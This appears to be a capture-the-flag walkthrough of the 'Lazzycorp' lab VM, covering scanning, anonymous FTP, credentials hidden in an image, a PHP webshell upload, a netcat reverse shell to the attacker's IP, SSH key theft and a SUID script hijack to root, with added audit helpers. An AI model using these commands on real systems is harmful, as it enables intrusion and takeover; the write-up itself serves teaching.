Lazzycorp


Information gathering

Host discovery

root@LAPTOP-O235O5EH [~] ➜  arp-scan -l                                                                                        [17:43:21]
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 10.156.131.149
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
10.156.131.40 08:00:27:b7:a9:99 PCS Systemtechnik GmbH
......

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.940 seconds (131.96 hosts/sec). 3 responded

Target: 10.156.131.40

Port scan

root@LAPTOP-O235O5EH [~] ➜  rustscan -a 10.156.131.40                                                                          [17:43:26]
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
Scanning ports: The virtual equivalent of knocking on doors.

[~] The config file is expected to be at "/root/.rustscan.toml"
[~] File limit higher than batch size. Can increase speed by increasing batch size '-b 10140'.
Open 10.156.131.40:22
Open 10.156.131.40:21
Open 10.156.131.40:80
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-19 17:43 CST
Initiating ARP Ping Scan at 17:43
Scanning 10.156.131.40 [1 port]
Completed ARP Ping Scan at 17:43, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 17:43
Completed Parallel DNS resolution of 1 host. at 17:43, 0.02s elapsed
DNS resolution of 1 IPs took 0.02s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 17:43
Scanning 10.156.131.40 [3 ports]
Discovered open port 21/tcp on 10.156.131.40
Discovered open port 22/tcp on 10.156.131.40
Discovered open port 80/tcp on 10.156.131.40
Completed SYN Stealth Scan at 17:43, 0.01s elapsed (3 total ports)
Nmap scan report for 10.156.131.40
Host is up, received arp-response (0.00054s latency).
Scanned at 2026-01-19 17:43:54 CST for 0s

PORT STATE SERVICE REASON
21/tcp open ftp syn-ack ttl 64
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 64
MAC Address: 08:00:27:B7:A9:99 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.16 seconds
Raw packets sent: 4 (160B) | Rcvd: 4 (160B)

Directory scan on 80/tcp


root@LAPTOP-O235O5EH [~] ➜  gobuster dir -u http://10.156.131.40 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt,zip,bak,js,py,sh,swp
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.156.131.40
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.8
[+] Extensions: zip,js,py,sh,swp,php,html,txt,bak
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 582]
/blog (Status: 301) [Size: 313] [--> http://10.156.131.40/blog/]
/uploads (Status: 301) [Size: 316] [--> http://10.156.131.40/uploads/]
/robots.txt (Status: 200) [Size: 55]
/server-status (Status: 403) [Size: 278]
Progress: 2205580 / 2205580 (100.00%)
===============================================================
Finished
===============================================================

/robots.txt lists two Disallow entries.

Note that paths on a Linux web server are case-sensitive: the entry as written in robots.txt does not resolve, but in lowercase (/auth-lazycorp-dev) it returns 403, which means the directory exists and only its listing is denied.

Scan that directory too:

root@LAPTOP-O235O5EH [~] ➜  gobuster dir -u http://10.156.131.40/auth-lazycorp-dev -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt,zip,bak,js,py,sh,swp
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.156.131.40/auth-lazycorp-dev
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.8
[+] Extensions: sh,txt,zip,bak,js,py,swp,php,html
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/login.php (Status: 200) [Size: 710]
/uploads (Status: 301) [Size: 334] [--> http://10.156.131.40/auth-lazycorp-dev/uploads/]
/dashboard.php (Status: 302) [Size: 0] [--> login.php]
Progress: 2205580 / 2205580 (100.00%)
===============================================================
Finished
===============================================================

/login.php is there, but we have no username or password.

The hint seen earlier says the credentials are inside a picture.

Also, rustscan found port 21 open, which is FTP.

FTP enumeration

Anonymous FTP is a feature of the FTP protocol that lets a user reach the public area of an FTP server without a valid username and password. Conventionally the username is "anonymous" and the password is the user's e-mail address, although many servers never check that "password".

Here just press Enter at the password prompt:

root@LAPTOP-O235O5EH [~] ➜  lftp 10.156.131.40 -u anonymous                                                                    [18:04:41]
Password:
lftp anonymous@10.156.131.40:~> ls
drwxr-xr-x 2 114 119 4096 Jul 16 2025 pub
lftp anonymous@10.156.131.40:/> cd pub/
lftp anonymous@10.156.131.40:/pub> ls
-rw-r--r-- 1 0 0 1366786 Jul 16 2025 note.jpg
lftp anonymous@10.156.131.40:/pub>

note.jpg matches the hint; download it:

get note.jpg

Running the file through the 随波逐流 CTF toolkit (a stego/forensics utility) pulls the credentials out of the image:

Username: dev
Password: d3v3l0pm3nt!nt3rn
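One way to find this kind of hidden text without a GUI tool, as an added example that is not part of the writeup: parse the JPEG marker segments and check the comment/application segments and anything appended after the End-Of-Image marker. The JPEG in the block is constructed inline, and the credential strings in it are placeholders, not the box's real ones.

```python
"""Added example, not from the original writeup: two quick checks for text hidden
in a JPEG such as note.jpg -- strings inside COM/APPn marker segments, and bytes
appended after the End-Of-Image marker. SAMPLE_JPEG is constructed here and the
credential strings in it are placeholders, not the box's real ones."""
import re
import struct

# Markers with no length field: TEM, RST0-7, SOI, EOI
STANDALONE = {0x01, 0xD8, 0xD9} | set(range(0xD0, 0xD8))
SOS, COM = 0xDA, 0xFE


def jpeg_segments(data: bytes):
    """Walk the marker segments up to Start-Of-Scan.

    Returns (segments, end): segments is a list of (marker, payload) pairs and
    end is the offset just past the EOI marker (len(data) if there is none),
    so data[end:] is whatever was appended to the image file."""
    if data[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG: missing SOI")
    segs, pos = [], 2
    while pos + 2 <= len(data):
        if data[pos] != 0xFF:
            raise ValueError(f"expected marker at offset {pos}")
        marker = data[pos + 1]
        if marker in STANDALONE:
            pos += 2
            continue
        if pos + 4 > len(data):
            break
        (length,) = struct.unpack(">H", data[pos + 2:pos + 4])  # includes the 2 length bytes
        segs.append((marker, data[pos + 4:pos + 2 + length]))
        pos += 2 + length
        if marker == SOS:
            # Entropy-coded data follows. A 0xFF byte inside it is always stuffed
            # as 0xFF00 (or is an RSTn marker), so the first 0xFFD9 is the real EOI.
            eoi = data.find(b"\xff\xd9", pos)
            return segs, (len(data) if eoi < 0 else eoi + 2)
    return segs, len(data)


def printable_strings(blob: bytes, min_len: int = 6):
    """Same idea as strings(1): runs of printable ASCII of at least min_len bytes."""
    return [m.decode("ascii") for m in re.findall(rb"[\x20-\x7e]{%d,}" % min_len, blob)]


def hidden_text(data: bytes):
    """Text from comment/application segments plus text trailing the EOI marker."""
    segs, end = jpeg_segments(data)
    in_segments = []
    for marker, payload in segs:
        if marker == COM or 0xE0 <= marker <= 0xEF:
            in_segments.extend(printable_strings(payload))
    return {"segments": in_segments, "trailing": printable_strings(data[end:])}


def _segment(marker: int, payload: bytes) -> bytes:
    return b"\xff" + bytes([marker]) + struct.pack(">H", len(payload) + 2) + payload


# Constructed sample: JFIF header, a comment segment, a minimal SOS header, fake
# scan data containing a stuffed 0xFF00, EOI, then a line appended after the image.
SAMPLE_JPEG = (
    b"\xff\xd8"
    + _segment(0xE0, b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00")
    + _segment(COM, b"Username: dev_example")
    + _segment(SOS, b"\x01\x01\x00\x00\x3f\x00")
    + b"\x12\x34\xff\x00\x56"
    + b"\xff\xd9"
    + b"Password: not_the_real_one!"
)

if __name__ == "__main__":
    import sys
    path = sys.argv[1] if len(sys.argv) > 1 else None
    data = open(path, "rb").read() if path else SAMPLE_JPEG
    for where, items in hidden_text(data).items():
        for s in items:
            print(f"[{where}] {s}")
```

Run it with a file path to check a real image. It only catches data stored in plain sight (comment segments, bytes after EOI), which is also what strings, exiftool and binwalk surface; LSB or steghide-style embedding needs a dedicated tool.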


Login succeeds and lands on a file upload feature.

Upload a PHP one-liner webshell directly. The upload response does not say where the file is stored, but the earlier scan of /auth-lazycorp-dev turned up an uploads directory, and after some trying that is where it ends up.

Privilege escalation

www shell

Reverse shell, with a listener already waiting on port 7777 of the attacker host:

busybox nc 10.156.131.64 7777 -e /bin/bash

www-data -> arvind

arvind's SSH private key sits under /home/arvind/.ssh/ and is readable from the www-data shell.

It can be used to log in directly (either from the www-data shell on the box, or after copying the key to the attacker machine; ssh refuses a key file that is readable by anyone other than its owner, so set mode 600 on the copy):

ssh arvind@10.156.131.40 -i /home/arvind/.ssh/id_rsa

arvind -> root

In arvind's home directory there is a binary named reset with the SUID bit set.

Inspecting it shows that it runs /usr/bin/reset_site.sh.

arvind@arvindlazycorp:~$ ls -al /usr/bin/reset_site.sh
-rwxrwxr-x 1 root arvind 19 Jan 19 10:22 /usr/bin/reset_site.sh

The script is owned by root but group-writable by arvind, and the SUID binary runs it as root, so we can replace its contents with our own command:

arvind@arvindlazycorp:~$ vim /usr/bin/reset_site.sh
arvind@arvindlazycorp:~$ cat /usr/bin/reset_site.sh
chmod +s /bin/bash

Trigger it by running the SUID binary:

./reset

arvind@arvindlazycorp:~$ ls -al /bin/bash
-rwsr-sr-x 1 root root 1183448 Apr 18 2022 /bin/bash

The SUID bit is now set on /bin/bash. Start bash with its -p option so it keeps the effective UID of root instead of dropping back to arvind, and the result is a root shell.
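The general form of this check, as an added example (not from the writeup): for every setuid-root binary, list the absolute paths embedded in it and flag those the current user can modify. The demo() fixture reconstructs the ./reset -> /usr/bin/reset_site.sh shape in a temporary directory; the script body in it is hypothetical.

```python
"""Added example, not from the original writeup: the check behind the ./reset
escalation, generalised. For each setuid-root binary, pull the absolute paths
embedded in it (what `strings` would show) and report those the current user can
write to; a writable helper script or config named by a setuid binary is a
root shell waiting to happen. demo() builds a constructed fixture so the logic
can be exercised without a real setuid binary."""
import os
import re
import stat
import tempfile

PATH_RE = re.compile(rb"/[A-Za-z0-9_./+-]{3,}")   # path-like strings inside a binary
SEARCH_ROOTS = ("/usr/bin", "/usr/sbin", "/bin", "/sbin", "/usr/local/bin", "/usr/local/sbin")


def is_suid_root(path: str) -> bool:
    st = os.lstat(path)
    return stat.S_ISREG(st.st_mode) and bool(st.st_mode & stat.S_ISUID) and st.st_uid == 0


def referenced_paths(binary: str):
    """Absolute paths mentioned in the file's bytes, de-duplicated."""
    with open(binary, "rb") as f:
        blob = f.read()
    return sorted({m.decode("ascii") for m in PATH_RE.findall(blob)})


def writable_dependencies(binary: str):
    """Referenced paths that exist as regular files we can modify.

    A missing file whose parent directory is writable counts too: we could
    create it, which is the same hijack from the binary's point of view."""
    hits = []
    for p in referenced_paths(binary):
        parent = os.path.dirname(p)
        if os.path.isfile(p) and os.access(p, os.W_OK):
            hits.append(p)
        elif not os.path.exists(p) and os.path.isdir(parent) and os.access(parent, os.W_OK):
            hits.append(p + "  (missing, parent writable)")
    return hits


def audit(extra=(), roots=SEARCH_ROOTS):
    """Map setuid-root binaries (plus any paths in `extra`, e.g. ~/reset) to writable deps."""
    candidates = list(extra)
    for root in roots:
        for dirpath, _, files in os.walk(root):
            candidates.extend(os.path.join(dirpath, n) for n in files)
    report = {}
    for c in candidates:
        try:
            if c in extra or is_suid_root(c):
                deps = writable_dependencies(c)
                if deps:
                    report[c] = deps
        except OSError:      # unreadable binary, dangling symlink, ...
            continue
    return report


def demo():
    """Constructed fixture: a fake helper that names a group-writable script and a
    not-yet-existing config, the same shape as ./reset -> /usr/bin/reset_site.sh.
    Returns (script_path, config_path, findings)."""
    work = tempfile.mkdtemp(prefix="suid_audit_")
    script = os.path.join(work, "reset_site.sh")
    conf = os.path.join(work, "site.conf")
    with open(script, "w") as f:
        f.write("#!/bin/sh\nrm -rf /var/www/html/uploads/*\n")   # hypothetical script body
    os.chmod(script, 0o775)                                      # rwxrwxr-x, like the writeup
    helper = os.path.join(work, "reset")
    with open(helper, "wb") as f:
        f.write(b"\x7fELF" + b"\x00" * 12 + b"/bin/sh\x00-c\x00"
                + script.encode() + b"\x00" + conf.encode() + b"\x00")
    return script, conf, writable_dependencies(helper)


if __name__ == "__main__":
    script, conf, found = demo()
    print("fixture:", found)
    for binary, deps in audit(extra=(os.path.expanduser("~/reset"),)).items():
        print(binary, "->", deps)
```

On the box, audit(extra=("/home/arvind/reset",)) would include the home-directory binary, which is outside the standard search roots. A path reported here is only useful if the binary really executes or reads it at runtime, so confirm that (for example with strings on the binary) before editing anything.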